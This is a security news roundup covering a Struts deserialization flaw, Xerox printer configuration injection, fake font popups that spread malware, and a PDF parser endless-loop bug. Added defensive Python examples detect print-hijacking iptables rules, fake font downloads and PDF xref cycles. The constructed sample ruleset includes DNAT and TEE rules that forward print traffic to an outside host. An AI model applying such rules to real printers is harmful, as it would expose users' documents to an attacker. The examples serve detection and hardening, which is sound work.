Critical Vulnerability Found in Apache Struts

A critical vulnerability has been found and patched in the widely used Apache Struts web development framework. The vulnerability is located in the popular REST communication plugin and can lead to remote code execution on affected servers.

The vulnerability was found by researchers from lgtm.com, a service used to analyze the code of open-source projects. It stems from deserialization of untrusted data, a known source of vulnerabilities for Java-based web applications.

The Apache Struts developers fixed the flaw in Struts version 2.5.13, released Tuesday, and users are advised to upgrade as soon as possible because attackers have exploited Struts vulnerabilities in widespread attacks in the past.

Apache Struts is used by companies and organizations from many industry sectors to build corporate websites and other Java-based web applications.

Authentication bypass in Xerox printers

Printer manufacturer Xerox has worked in recent years to secure the firmware and configuration update functionality in its products, but some printer models are still vulnerable to data hijacking.

Security researchers from the Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE) in Germany found that some Xerox printer models still allow their configuration to be changed by sending a file as a print job on a specific communications port.

This action does not require authentication and while it can’t be used to execute arbitrary code on the device, it can be used to inject a rogue iptables file. Such a file could modify the rules of the firmware’s kernel firewall and could forward all print jobs received by the printer to the attacker, leading to potential leaks of sensitive information.

According to the Fraunhofer Institute researchers, Xerox responded to their report by saying that this is a legacy feature provided for convenience to customers. The company has begun adding an option to turn off this functionality in newer products, but the researchers recommend disabling the firmware update and configuration cloning features on older models.
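The kind of rule an injected iptables file would have to contain, and how an administrator could spot it, as an added example that is not Xerox's or Fraunhofer FKIE's code: the script parses iptables-save output and flags rules that redirect (DNAT) or mirror (TEE) print-port traffic to an address outside the device. The ruleset is constructed, and the ports it treats as print traffic (9100, 515, 631) are an assumption about common printing services, not the port named in the Fraunhofer report.

```python
"""Flag iptables rules that would send a printer's own print traffic off the device.

Added example: this is not Xerox's or Fraunhofer FKIE's code. The ruleset below is
constructed in iptables-save format, and the ports it treats as print traffic
(9100 raw, 515 LPD, 631 IPP) are an assumption about common printing services,
not the port named in the Fraunhofer report.
"""
import ipaddress
import shlex

PRINT_PORTS = {"9100", "515", "631"}   # assumption: common printing services
HIJACK_TARGETS = {"DNAT", "TEE"}       # DNAT redirects a flow, TEE mirrors it

# Constructed sample: one benign local redirect, one DNAT and one TEE to an outside host.
SAMPLE_RULESET = """\
*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp --dport 631 -j REDIRECT --to-ports 8631
-A PREROUTING -p tcp --dport 9100 -j DNAT --to-destination 203.0.113.7:9100
COMMIT
*mangle
-A PREROUTING -p tcp --dport 9100 -j TEE --gateway 203.0.113.7
-A PREROUTING -p tcp --dport 22 -j ACCEPT
COMMIT
"""

def parse_rules(text):
    """Yield (table, tokens) for each '-A' rule in iptables-save output."""
    table = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A "):
            yield table, shlex.split(line)

def option_value(tokens, name):
    """Return the argument following option `name`, or None if absent."""
    for i, tok in enumerate(tokens):
        if tok == name and i + 1 < len(tokens):
            return tokens[i + 1]
    return None

def is_offbox(address):
    """True unless the IPv4 destination (optionally 'addr:port') is loopback."""
    host = address.rsplit(":", 1)[0]
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True   # hostnames and address ranges: treat as off-box

def find_print_hijack_rules(text):
    """Return rules that redirect or mirror print-port traffic to another host."""
    findings = []
    for table, tokens in parse_rules(text):
        if option_value(tokens, "--dport") not in PRINT_PORTS:
            continue
        target = option_value(tokens, "-j")
        if target not in HIJACK_TARGETS:
            continue
        dest = option_value(tokens, "--to-destination") or option_value(tokens, "--gateway")
        if dest and is_offbox(dest):
            findings.append("%s: %s" % (table, " ".join(tokens)))
    return findings

if __name__ == "__main__":
    for rule in find_print_hijack_rules(SAMPLE_RULESET):
        print("print traffic leaves the device:", rule)
```

REDIRECT is deliberately not treated as a finding: it only moves a flow to another local port, whereas DNAT and TEE are the targets that can deliver a copy of every job to another host. On a device where the ruleset cannot be dumped, the same check can be run on the configuration file before it is applied.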

Rogue font pop-ups spread malware

Attackers are increasingly relying on a web-based social engineering trick to infect computers with malware. The technique involves loading malicious JavaScript code on compromised websites to make their content appear scrambled inside browsers and to ask users to download a missing font. The font is actually malware.

The so-called “HoeflerText” font method was first documented in January by researchers from Proofpoint in connection to attack campaigns launched by a cybercriminal gang known as EITest.

More recently, the technique has been used to distribute a new version of the Locky ransomware and a commercial remote access tool (RAT) called NetSupport Manager. Users of Google Chrome and Mozilla Firefox seem to be specifically targeted.

“Users should be aware of this ongoing threat,” researchers from security firm Palo Alto Networks said Friday in a blog post. “Be suspicious of popup messages in Google Chrome that state: The ‘HoeflerText’ font wasn’t found. Since this is a RAT, infected users will probably not notice any change in their day-to-day computer use. If the NetSupport Manager RAT is found on your Windows host, it is probably related to a malware infection.”
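The defensive counterpart to the trick described above, as an added example that is not code from Proofpoint or Palo Alto Networks: a gateway-side check that classifies a download presented as a "font" by its leading bytes rather than by the file name the page offers, since the name is under the attacker's control. The file names and byte strings are constructed.

```python
"""Decide whether a file served as a "missing font" really is a font.

Added example, not code from Proofpoint or Palo Alto Networks. It looks at the
leading bytes of the download rather than at the file name the page offers,
because the name is under the attacker's control. All samples are constructed
byte strings; the file names are made up.
"""
FONT_MAGIC = {                      # first four bytes of common font containers
    b"\x00\x01\x00\x00": "truetype",
    b"true": "truetype",            # older Apple TrueType
    b"OTTO": "opentype-cff",
    b"wOFF": "woff",
    b"wOF2": "woff2",
    b"ttcf": "truetype-collection",
}
FONT_EXTENSIONS = {"ttf", "otf", "woff", "woff2", "ttc"}

def classify_blob(data):
    """Return the container type implied by the file's magic bytes."""
    if data[:4] in FONT_MAGIC:
        return FONT_MAGIC[data[:4]]
    if data[:2] == b"MZ":
        return "pe-executable"      # Windows EXE/DLL, whatever the extension says
    if data[:4] == b"\x7fELF":
        return "elf-executable"
    if data[:2] == b"PK":
        return "zip-archive"        # commonly wraps a script or an EXE
    return "unknown"

def assess_font_download(filename, data):
    """Verdict a proxy or mail gateway could log for a download presented as a font."""
    kind = classify_blob(data)
    name = filename.lower()
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    presented_as_font = ext in FONT_EXTENSIONS or "font" in name
    runnable = kind.endswith("-executable") or kind == "zip-archive"
    return {"filename": filename, "content_type": kind,
            "suspicious": presented_as_font and runnable}

# Constructed samples: a genuine WOFF header, an EXE offered as a font update,
# and an EXE renamed to a .ttf extension.
SAMPLES = [
    ("HoeflerText.woff", b"wOFF\x00\x01\x00\x00" + b"\x00" * 40),
    ("HoeflerText_Font_Update.exe", b"MZ\x90\x00" + b"\x00" * 60),
    ("Font_Update.ttf", b"MZ\x90\x00" + b"\x00" * 60),
]

def scan_samples(samples=SAMPLES):
    """Assess each (filename, bytes) pair; used by the stand-alone run below."""
    return [assess_font_download(name, blob) for name, blob in samples]

if __name__ == "__main__":
    for verdict in scan_samples():
        print(verdict)
```

A real font never starts with a PE or ELF header, so the content check catches both the plain ".exe" delivered by the popup and an executable renamed with a font extension; the second and third samples are flagged, the genuine WOFF is not.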

Most PDF viewers exposed to 6-year-old endless loop flaw

Code bugs that can cause endless loops leading to application crashes or abnormal CPU resource utilization are serious issues, even though they don’t have security implications beyond denial-of-service.

Such a bug was recently found by German security researcher Hanno Böck of the Fuzzing Project in five different PDF parsing projects: QPDF, PDF.js (used in Mozilla Firefox), PDFium (used in Chrome), Ghostscript and the PDF library used in Microsoft Edge. Adobe Reader and the native PDF viewer in macOS were not affected.

What’s interesting about this bug is that the exact same issue was reported and fixed in a different PDF parsing library in 2011. It turns out that despite the problem being known, other PDF parsing libraries never tested for it.

“It is remarkable that a bug that was discovered six years ago affected the majority of widely used PDF implementations,” Böck said Sunday in a blog post. “But it falls into a pattern of IT security: Very often discovering security issues means rediscovering old issues. In general, this is a difficult problem to solve, as it touches complex questions about knowledge transfer.”
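The blog post above does not spell out which structure loops, so the following added example (not code from QPDF, PDF.js, PDFium, Ghostscript or Edge, and not a reconstruction of the reported bug) assumes only the general shape of such a defect: a parser following file-supplied offsets, here the /Prev entry that links each PDF trailer to the previous cross-reference section, without remembering which offsets it has already visited. It shows the unbounded walk beside a hardened one and constructs the minimal PDF fragments it needs.

```python
"""Walk a PDF cross-reference chain without looping forever on a bad /Prev.

Added example: this is not code from any of the parsers named above, and it does
not claim to be the exact bug Böck reported. It assumes the general shape of such
a bug: a parser following file-supplied offsets (here the /Prev entry in each
trailer) without remembering which offsets it has already visited. The PDF
fragments are constructed by build_pdf() and are just enough for the walk.
"""
import re

HEADER = b"%PDF-1.4\n"
TRAILER_RE = re.compile(rb"trailer\s*<<(.*?)>>", re.DOTALL)
PREV_RE = re.compile(rb"/Prev\s+(\d+)")

def startxref(data):
    """Offset of the last xref section, as declared at the end of the file."""
    m = re.search(rb"startxref\s+(\d+)", data)
    if not m:
        raise ValueError("no startxref")
    return int(m.group(1))

def find_prev(data, offset):
    """Return the /Prev offset from the trailer of the section at `offset`, or None."""
    m = TRAILER_RE.search(data, offset)
    if not m:
        return None
    p = PREV_RE.search(m.group(1))
    return int(p.group(1)) if p else None

def walk_xref_chain_unsafe(data):
    """The bug's shape: trusts every /Prev, so a cycle never terminates."""
    offsets, offset = [], startxref(data)
    while offset is not None:
        offsets.append(offset)
        offset = find_prev(data, offset)
    return offsets

def walk_xref_chain(data, max_sections=64):
    """Hardened walk: refuses revisited offsets, out-of-range offsets and long chains."""
    offsets, offset = [], startxref(data)
    while offset is not None:
        if offset in offsets:
            raise ValueError("xref /Prev cycle at offset %d" % offset)
        if offset >= len(data):
            raise ValueError("xref offset %d past end of file" % offset)
        if len(offsets) >= max_sections:
            raise ValueError("xref chain longer than %d sections" % max_sections)
        offsets.append(offset)
        offset = find_prev(data, offset)
    return offsets

def detects_cycle(data):
    """True when the hardened walker rejects `data` because of a /Prev cycle."""
    try:
        walk_xref_chain(data)
    except ValueError as err:
        return "cycle" in str(err)
    return False

def _section(prev_offset):
    """One empty xref section plus trailer; /Prev is written fixed-width."""
    prev = b"" if prev_offset is None else b" /Prev %06d" % prev_offset
    return b"xref\n0 0\ntrailer\n<< /Size 1" + prev + b" >>\n"

def build_pdf(chain):
    """Constructed test file: chain[i] is the index section i's /Prev points at, or None."""
    offsets, pos = [], len(HEADER)
    for prev in chain:   # fixed-width /Prev keeps section lengths independent of values
        offsets.append(pos)
        pos += len(_section(None if prev is None else 0))
    body = b"".join(_section(None if p is None else offsets[p]) for p in chain)
    return HEADER + body + b"startxref\n%d\n%%%%EOF\n" % offsets[-1]

if __name__ == "__main__":
    print(walk_xref_chain(build_pdf([None, 0, 1])))   # three sections, oldest last
    print(detects_cycle(build_pdf([1, 0])))             # two trailers pointing at each other
    print(detects_cycle(build_pdf([0])))                # a trailer whose /Prev is itself
```

The unsafe walker is kept only to show the shape of the defect; calling it on either cyclic file would never return. The hardened version needs just a list of visited offsets and an upper bound on chain length, which is also the natural regression test to add once a bug like this is known, since a self-referencing /Prev is a one-line fuzzing seed.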

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor’s degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key’s fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42
